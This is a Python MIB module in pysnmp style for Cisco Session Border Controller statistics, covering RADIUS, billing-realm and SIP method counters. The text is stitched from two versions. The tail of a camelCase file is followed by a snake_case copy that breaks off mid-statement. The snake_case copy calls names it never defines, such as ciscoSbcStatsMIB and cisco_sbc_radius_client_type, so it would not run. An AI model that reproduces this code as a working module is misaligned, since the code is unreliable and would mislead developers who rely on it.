csbSIPMthdRCHistoryStatsTable.setStatus('current') csbSIPMthdRCHistoryStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 6, 1), ).setIndexNames((0, "CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB", "csbCallStatsInstanceIndex"), (0, "CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB", "csbCallStatsServiceIndex"), (0, "CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdRCHistoryStatsAdjName"), (0, "CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdRCHistoryStatsMethod"), (0, "CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdRCHistoryStatsRespCode"), (0, "CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdRCHistoryStatsInterval")) if mibBuilder.loadTexts: csbSIPMthdRCHistoryStatsEntry.setStatus('current') csbSIPMthdRCHistoryStatsAdjName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 6, 1, 1), SnmpAdminString()).setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdRCHistoryStatsAdjName.setStatus('current') csbSIPMthdRCHistoryStatsMethod = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 6, 1, 2), CiscoSbcSIPMethod()) if mibBuilder.loadTexts: csbSIPMthdRCHistoryStatsMethod.setStatus('current') csbSIPMthdRCHistoryStatsMethodName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 6, 1, 3), SnmpAdminString()).setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdRCHistoryStatsMethodName.setStatus('current') csbSIPMthdRCHistoryStatsRespCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 6, 1, 4), Unsigned32()) if mibBuilder.loadTexts: csbSIPMthdRCHistoryStatsRespCode.setStatus('current') csbSIPMthdRCHistoryStatsInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 6, 1, 5), CiscoSbcPeriodicStatsInterval()) if mibBuilder.loadTexts: csbSIPMthdRCHistoryStatsInterval.setStatus('current') csbSIPMthdRCHistoryStatsRespIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 6, 1, 6), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdRCHistoryStatsRespIn.setStatus('current') csbSIPMthdRCHistoryStatsRespOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 6, 1, 7), Gauge32()).setUnits('responses').setMaxAccess("readonly") if mibBuilder.loadTexts: csbSIPMthdRCHistoryStatsRespOut.setStatus('current') csbStatsMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 757, 2, 1)) csbStatsMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 757, 2, 2)) csbStatsMIBCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 757, 2, 1, 1)).setObjects(("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRadiusStatsGroup"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRfBillRealmStatsGroup"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsGroup"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsGroup"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdRCHistoryStatsGroup"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdRCCurrentStatsGroup")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): csbStatsMIBCompliance = csbStatsMIBCompliance.setStatus('current') csbRadiusStatsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 757, 2, 2, 1)).setObjects(("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRadiusStatsClientName"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRadiusStatsClientType"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRadiusStatsSrvrName"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRadiusStatsAcsReqs"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRadiusStatsAcsRtrns"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRadiusStatsAcsAccpts"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRadiusStatsAcsRejects"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRadiusStatsAcsChalls"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRadiusStatsActReqs"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRadiusStatsActRetrans"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRadiusStatsActRsps"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRadiusStatsMalformedRsps"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRadiusStatsBadAuths"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRadiusStatsPending"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRadiusStatsTimeouts"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRadiusStatsUnknownType"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRadiusStatsDropped")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): csbRadiusStatsGroup = csbRadiusStatsGroup.setStatus('current') csbRfBillRealmStatsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 757, 2, 2, 2)).setObjects(("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRfBillRealmStatsRealmName"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRfBillRealmStatsTotalStartAcrs"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRfBillRealmStatsTotalInterimAcrs"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRfBillRealmStatsTotalStopAcrs"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRfBillRealmStatsTotalEventAcrs"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRfBillRealmStatsSuccStartAcrs"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRfBillRealmStatsSuccInterimAcrs"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRfBillRealmStatsSuccStopAcrs"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRfBillRealmStatsSuccEventAcrs"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRfBillRealmStatsFailStartAcrs"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRfBillRealmStatsFailInterimAcrs"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRfBillRealmStatsFailStopAcrs"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbRfBillRealmStatsFailEventAcrs")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): csbRfBillRealmStatsGroup = csbRfBillRealmStatsGroup.setStatus('current') csbSIPMthdCurrentStatsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 757, 2, 2, 3)).setObjects(("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsAdjName"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsMethodName"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsReqIn"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsReqOut"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsResp1xxIn"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsResp1xxOut"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsResp2xxIn"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsResp2xxOut"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsResp3xxIn"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsResp3xxOut"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsResp4xxIn"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsResp4xxOut"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsResp5xxIn"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsResp5xxOut"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsResp6xxIn"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdCurrentStatsResp6xxOut")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): csbSIPMthdCurrentStatsGroup = csbSIPMthdCurrentStatsGroup.setStatus('current') csbSIPMthdHistoryStatsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 757, 2, 2, 4)).setObjects(("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsAdjName"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsMethodName"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsReqIn"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsReqOut"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsResp1xxIn"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsResp1xxOut"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsResp2xxIn"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsResp2xxOut"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsResp3xxIn"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsResp3xxOut"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsResp4xxIn"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsResp4xxOut"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsResp5xxIn"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsResp5xxOut"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsResp6xxIn"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdHistoryStatsResp6xxOut")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): csbSIPMthdHistoryStatsGroup = csbSIPMthdHistoryStatsGroup.setStatus('current') csbSIPMthdRCCurrentStatsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 757, 2, 2, 5)).setObjects(("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdRCCurrentStatsAdjName"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdRCCurrentStatsMethodName"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdRCCurrentStatsRespIn"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdRCCurrentStatsRespOut")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): csbSIPMthdRCCurrentStatsGroup = csbSIPMthdRCCurrentStatsGroup.setStatus('current') csbSIPMthdRCHistoryStatsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 757, 2, 2, 6)).setObjects(("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdRCHistoryStatsAdjName"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdRCHistoryStatsMethodName"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdRCHistoryStatsRespIn"), ("CISCO-SESS-BORDER-CTRLR-STATS-MIB", "csbSIPMthdRCHistoryStatsRespOut")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): csbSIPMthdRCHistoryStatsGroup = csbSIPMthdRCHistoryStatsGroup.setStatus('current') mibBuilder.exportSymbols("CISCO-SESS-BORDER-CTRLR-STATS-MIB", csbRfBillRealmStatsSuccStartAcrs=csbRfBillRealmStatsSuccStartAcrs, csbRadiusStatsMalformedRsps=csbRadiusStatsMalformedRsps, PYSNMP_MODULE_ID=ciscoSbcStatsMIB, csbSIPMthdCurrentStatsResp1xxIn=csbSIPMthdCurrentStatsResp1xxIn, csbSIPMthdCurrentStatsResp4xxIn=csbSIPMthdCurrentStatsResp4xxIn, csbSIPMthdRCCurrentStatsEntry=csbSIPMthdRCCurrentStatsEntry, csbRfBillRealmStatsTable=csbRfBillRealmStatsTable, csbSIPMthdCurrentStatsResp3xxIn=csbSIPMthdCurrentStatsResp3xxIn, csbSIPMthdRCCurrentStatsMethodName=csbSIPMthdRCCurrentStatsMethodName, csbSIPMthdHistoryStatsReqOut=csbSIPMthdHistoryStatsReqOut, csbSIPMthdRCCurrentStatsAdjName=csbSIPMthdRCCurrentStatsAdjName, csbRadiusStatsActRsps=csbRadiusStatsActRsps, csbSIPMthdCurrentStatsResp3xxOut=csbSIPMthdCurrentStatsResp3xxOut, csbSIPMthdRCCurrentStatsRespOut=csbSIPMthdRCCurrentStatsRespOut, csbRadiusStatsEntry=csbRadiusStatsEntry, csbRfBillRealmStatsGroup=csbRfBillRealmStatsGroup, csbSIPMthdHistoryStatsReqIn=csbSIPMthdHistoryStatsReqIn, csbRadiusStatsActRetrans=csbRadiusStatsActRetrans, csbRadiusStatsClientType=csbRadiusStatsClientType, csbRadiusStatsAcsChalls=csbRadiusStatsAcsChalls, ciscoSbcStatsMIBNotifs=ciscoSbcStatsMIBNotifs, csbSIPMthdRCCurrentStatsTable=csbSIPMthdRCCurrentStatsTable, csbStatsMIBGroups=csbStatsMIBGroups, csbRfBillRealmStatsTotalStopAcrs=csbRfBillRealmStatsTotalStopAcrs, csbSIPMthdCurrentStatsResp4xxOut=csbSIPMthdCurrentStatsResp4xxOut, csbSIPMthdHistoryStatsResp6xxOut=csbSIPMthdHistoryStatsResp6xxOut, csbSIPMthdHistoryStatsGroup=csbSIPMthdHistoryStatsGroup, csbSIPMthdCurrentStatsAdjName=csbSIPMthdCurrentStatsAdjName, csbRadiusStatsAcsRejects=csbRadiusStatsAcsRejects, csbSIPMthdHistoryStatsResp2xxIn=csbSIPMthdHistoryStatsResp2xxIn, csbSIPMthdHistoryStatsResp3xxIn=csbSIPMthdHistoryStatsResp3xxIn, csbRadiusStatsAcsReqs=csbRadiusStatsAcsReqs, csbRadiusStatsBadAuths=csbRadiusStatsBadAuths, csbStatsMIBCompliances=csbStatsMIBCompliances, csbSIPMthdHistoryStatsMethodName=csbSIPMthdHistoryStatsMethodName, csbSIPMthdRCHistoryStatsGroup=csbSIPMthdRCHistoryStatsGroup, csbSIPMthdCurrentStatsReqOut=csbSIPMthdCurrentStatsReqOut, csbSIPMthdRCHistoryStatsInterval=csbSIPMthdRCHistoryStatsInterval, csbRadiusStatsTimeouts=csbRadiusStatsTimeouts, CiscoSbcRadiusClientType=CiscoSbcRadiusClientType, csbSIPMthdRCHistoryStatsAdjName=csbSIPMthdRCHistoryStatsAdjName, csbSIPMthdRCHistoryStatsRespOut=csbSIPMthdRCHistoryStatsRespOut, csbSIPMthdCurrentStatsResp1xxOut=csbSIPMthdCurrentStatsResp1xxOut, csbSIPMthdCurrentStatsMethodName=csbSIPMthdCurrentStatsMethodName, csbRadiusStatsAcsAccpts=csbRadiusStatsAcsAccpts, CiscoSbcSIPMethod=CiscoSbcSIPMethod, csbRadiusStatsDropped=csbRadiusStatsDropped, csbRadiusStatsEntIndex=csbRadiusStatsEntIndex, csbRfBillRealmStatsSuccEventAcrs=csbRfBillRealmStatsSuccEventAcrs, csbRfBillRealmStatsSuccStopAcrs=csbRfBillRealmStatsSuccStopAcrs, csbSIPMthdHistoryStatsResp1xxIn=csbSIPMthdHistoryStatsResp1xxIn, csbRfBillRealmStatsFailStartAcrs=csbRfBillRealmStatsFailStartAcrs, csbSIPMthdRCHistoryStatsMethodName=csbSIPMthdRCHistoryStatsMethodName, csbSIPMthdRCCurrentStatsGroup=csbSIPMthdRCCurrentStatsGroup, csbSIPMthdRCHistoryStatsTable=csbSIPMthdRCHistoryStatsTable, csbSIPMthdRCCurrentStatsMethod=csbSIPMthdRCCurrentStatsMethod, csbSIPMthdHistoryStatsResp5xxIn=csbSIPMthdHistoryStatsResp5xxIn, csbSIPMthdHistoryStatsResp1xxOut=csbSIPMthdHistoryStatsResp1xxOut, csbRfBillRealmStatsRealmName=csbRfBillRealmStatsRealmName, ciscoSbcStatsMIBObjects=ciscoSbcStatsMIBObjects, csbRadiusStatsClientName=csbRadiusStatsClientName, csbSIPMthdHistoryStatsAdjName=csbSIPMthdHistoryStatsAdjName, csbSIPMthdRCHistoryStatsEntry=csbSIPMthdRCHistoryStatsEntry, csbRfBillRealmStatsTotalStartAcrs=csbRfBillRealmStatsTotalStartAcrs, csbSIPMthdHistoryStatsResp5xxOut=csbSIPMthdHistoryStatsResp5xxOut, csbSIPMthdHistoryStatsInterval=csbSIPMthdHistoryStatsInterval, csbSIPMthdHistoryStatsMethod=csbSIPMthdHistoryStatsMethod, csbSIPMthdCurrentStatsGroup=csbSIPMthdCurrentStatsGroup, csbSIPMthdCurrentStatsResp6xxIn=csbSIPMthdCurrentStatsResp6xxIn, csbRfBillRealmStatsFailInterimAcrs=csbRfBillRealmStatsFailInterimAcrs, csbSIPMthdRCCurrentStatsInterval=csbSIPMthdRCCurrentStatsInterval, csbSIPMthdHistoryStatsResp2xxOut=csbSIPMthdHistoryStatsResp2xxOut, csbSIPMthdCurrentStatsResp2xxOut=csbSIPMthdCurrentStatsResp2xxOut, csbRadiusStatsUnknownType=csbRadiusStatsUnknownType, csbRfBillRealmStatsTotalEventAcrs=csbRfBillRealmStatsTotalEventAcrs, csbSIPMthdHistoryStatsTable=csbSIPMthdHistoryStatsTable, csbSIPMthdCurrentStatsEntry=csbSIPMthdCurrentStatsEntry, csbSIPMthdCurrentStatsMethod=csbSIPMthdCurrentStatsMethod, ciscoSbcStatsMIBConform=ciscoSbcStatsMIBConform, csbSIPMthdRCCurrentStatsRespCode=csbSIPMthdRCCurrentStatsRespCode, csbSIPMthdCurrentStatsTable=csbSIPMthdCurrentStatsTable, csbRfBillRealmStatsSuccInterimAcrs=csbRfBillRealmStatsSuccInterimAcrs, csbRadiusStatsSrvrName=csbRadiusStatsSrvrName, csbRadiusStatsAcsRtrns=csbRadiusStatsAcsRtrns, csbRfBillRealmStatsFailEventAcrs=csbRfBillRealmStatsFailEventAcrs, csbRfBillRealmStatsEntry=csbRfBillRealmStatsEntry, csbRfBillRealmStatsFailStopAcrs=csbRfBillRealmStatsFailStopAcrs, csbStatsMIBCompliance=csbStatsMIBCompliance, csbSIPMthdHistoryStatsResp4xxIn=csbSIPMthdHistoryStatsResp4xxIn, csbSIPMthdCurrentStatsResp5xxOut=csbSIPMthdCurrentStatsResp5xxOut, csbRadiusStatsPending=csbRadiusStatsPending, csbSIPMthdCurrentStatsInterval=csbSIPMthdCurrentStatsInterval, csbSIPMthdRCHistoryStatsRespCode=csbSIPMthdRCHistoryStatsRespCode, csbRfBillRealmStatsIndex=csbRfBillRealmStatsIndex, csbRadiusStatsTable=csbRadiusStatsTable, ciscoSbcStatsMIB=ciscoSbcStatsMIB, csbSIPMthdHistoryStatsEntry=csbSIPMthdHistoryStatsEntry, csbRadiusStatsActReqs=csbRadiusStatsActReqs, csbSIPMthdRCCurrentStatsRespIn=csbSIPMthdRCCurrentStatsRespIn, csbSIPMthdHistoryStatsResp3xxOut=csbSIPMthdHistoryStatsResp3xxOut, csbSIPMthdCurrentStatsReqIn=csbSIPMthdCurrentStatsReqIn, csbSIPMthdRCHistoryStatsRespIn=csbSIPMthdRCHistoryStatsRespIn, csbSIPMthdRCHistoryStatsMethod=csbSIPMthdRCHistoryStatsMethod, csbSIPMthdCurrentStatsResp5xxIn=csbSIPMthdCurrentStatsResp5xxIn, csbSIPMthdCurrentStatsResp2xxIn=csbSIPMthdCurrentStatsResp2xxIn, csbSIPMthdCurrentStatsResp6xxOut=csbSIPMthdCurrentStatsResp6xxOut, csbSIPMthdHistoryStatsResp6xxIn=csbSIPMthdHistoryStatsResp6xxIn, csbRadiusStatsGroup=csbRadiusStatsGroup, csbRfBillRealmStatsTotalInterimAcrs=csbRfBillRealmStatsTotalInterimAcrs, csbSIPMthdHistoryStatsResp4xxOut=csbSIPMthdHistoryStatsResp4xxOut)
(octet_string, integer, object_identifier) = mibBuilder.importSymbols('ASN1', 'OctetString', 'Integer', 'ObjectIdentifier') (named_values,) = mibBuilder.importSymbols('ASN1-ENUMERATION', 'NamedValues') (value_size_constraint, constraints_union, constraints_intersection, value_range_constraint, single_value_constraint) = mibBuilder.importSymbols('ASN1-REFINEMENT', 'ValueSizeConstraint', 'ConstraintsUnion', 'ConstraintsIntersection', 'ValueRangeConstraint', 'SingleValueConstraint') (csb_call_stats_instance_index, csb_call_stats_service_index, cisco_sbc_periodic_stats_interval) = mibBuilder.importSymbols('CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB', 'csbCallStatsInstanceIndex', 'csbCallStatsServiceIndex', 'CiscoSbcPeriodicStatsInterval') (cisco_mgmt,) = mibBuilder.importSymbols('CISCO-SMI', 'ciscoMgmt') (snmp_admin_string,) = mibBuilder.importSymbols('SNMP-FRAMEWORK-MIB', 'SnmpAdminString') (notification_group, module_compliance, object_group) = mibBuilder.importSymbols('SNMPv2-CONF', 'NotificationGroup', 'ModuleCompliance', 'ObjectGroup') (mib_scalar, mib_table, mib_table_row, mib_table_column, time_ticks, module_identity, iso, object_identity, integer32, gauge32, ip_address, bits, counter32, unsigned32, mib_identifier, counter64, notification_type) = mibBuilder.importSymbols('SNMPv2-SMI', 'MibScalar', 'MibTable', 'MibTableRow', 'MibTableColumn', 'TimeTicks', 'ModuleIdentity', 'iso', 'ObjectIdentity', 'Integer32', 'Gauge32', 'IpAddress', 'Bits', 'Counter32', 'Unsigned32', 'MibIdentifier', 'Counter64', 'NotificationType') (textual_convention, display_string) = mibBuilder.importSymbols('SNMPv2-TC', 'TextualConvention', 'DisplayString') cisco_sbc_stats_mib = module_identity((1, 3, 6, 1, 4, 1, 9, 9, 757)) ciscoSbcStatsMIB.setRevisions(('2010-09-15 00:00',)) if mibBuilder.loadTexts: ciscoSbcStatsMIB.setLastUpdated('201009150000Z') if mibBuilder.loadTexts: ciscoSbcStatsMIB.setOrganization('Cisco Systems, Inc.') class Ciscosbcsipmethod(TextualConvention, Integer32): status = 'current' subtype_spec = Integer32.subtypeSpec + constraints_union(single_value_constraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14)) named_values = named_values(('unknown', 1), ('ack', 2), ('bye', 3), ('cancel', 4), ('info', 5), ('invite', 6), ('message', 7), ('notify', 8), ('options', 9), ('prack', 10), ('refer', 11), ('register', 12), ('subscribe', 13), ('update', 14)) class Ciscosbcradiusclienttype(TextualConvention, Integer32): status = 'current' subtype_spec = Integer32.subtypeSpec + constraints_union(single_value_constraint(1, 2)) named_values = named_values(('authentication', 1), ('accounting', 2)) cisco_sbc_stats_mib_notifs = mib_identifier((1, 3, 6, 1, 4, 1, 9, 9, 757, 0)) cisco_sbc_stats_mib_objects = mib_identifier((1, 3, 6, 1, 4, 1, 9, 9, 757, 1)) cisco_sbc_stats_mib_conform = mib_identifier((1, 3, 6, 1, 4, 1, 9, 9, 757, 2)) csb_radius_stats_table = mib_table((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1)) if mibBuilder.loadTexts: csbRadiusStatsTable.setStatus('current') csb_radius_stats_entry = mib_table_row((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1)).setIndexNames((0, 'CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB', 'csbCallStatsInstanceIndex'), (0, 'CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB', 'csbCallStatsServiceIndex'), (0, 'CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRadiusStatsEntIndex')) if mibBuilder.loadTexts: csbRadiusStatsEntry.setStatus('current') csb_radius_stats_ent_index = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 1), unsigned32()) if mibBuilder.loadTexts: csbRadiusStatsEntIndex.setStatus('current') csb_radius_stats_client_name = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 2), snmp_admin_string()).setMaxAccess('readonly') if mibBuilder.loadTexts: csbRadiusStatsClientName.setStatus('current') csb_radius_stats_client_type = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 3), cisco_sbc_radius_client_type()).setMaxAccess('readonly') if mibBuilder.loadTexts: csbRadiusStatsClientType.setStatus('current') csb_radius_stats_srvr_name = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 4), snmp_admin_string()).setMaxAccess('readonly') if mibBuilder.loadTexts: csbRadiusStatsSrvrName.setStatus('current') csb_radius_stats_acs_reqs = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 5), counter64()).setUnits('packets').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRadiusStatsAcsReqs.setStatus('current') csb_radius_stats_acs_rtrns = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 6), counter64()).setUnits('packets').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRadiusStatsAcsRtrns.setStatus('current') csb_radius_stats_acs_accpts = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 7), counter64()).setMaxAccess('readonly') if mibBuilder.loadTexts: csbRadiusStatsAcsAccpts.setStatus('current') csb_radius_stats_acs_rejects = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 8), counter64()).setUnits('packets').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRadiusStatsAcsRejects.setStatus('current') csb_radius_stats_acs_challs = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 9), counter64()).setUnits('packets').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRadiusStatsAcsChalls.setStatus('current') csb_radius_stats_act_reqs = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 10), counter64()).setUnits('packets').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRadiusStatsActReqs.setStatus('current') csb_radius_stats_act_retrans = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 11), counter64()).setUnits('packets').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRadiusStatsActRetrans.setStatus('current') csb_radius_stats_act_rsps = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 12), counter64()).setUnits('packets').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRadiusStatsActRsps.setStatus('current') csb_radius_stats_malformed_rsps = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 13), counter64()).setUnits('packets').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRadiusStatsMalformedRsps.setStatus('current') csb_radius_stats_bad_auths = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 14), counter64()).setUnits('packets').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRadiusStatsBadAuths.setStatus('current') csb_radius_stats_pending = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 15), gauge32()).setUnits('packets').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRadiusStatsPending.setStatus('current') csb_radius_stats_timeouts = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 16), counter64()).setUnits('packets').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRadiusStatsTimeouts.setStatus('current') csb_radius_stats_unknown_type = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 17), counter64()).setUnits('packets').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRadiusStatsUnknownType.setStatus('current') csb_radius_stats_dropped = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 1, 1, 18), counter64()).setUnits('packets').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRadiusStatsDropped.setStatus('current') csb_rf_bill_realm_stats_table = mib_table((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2)) if mibBuilder.loadTexts: csbRfBillRealmStatsTable.setStatus('current') csb_rf_bill_realm_stats_entry = mib_table_row((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1)).setIndexNames((0, 'CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB', 'csbCallStatsInstanceIndex'), (0, 'CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB', 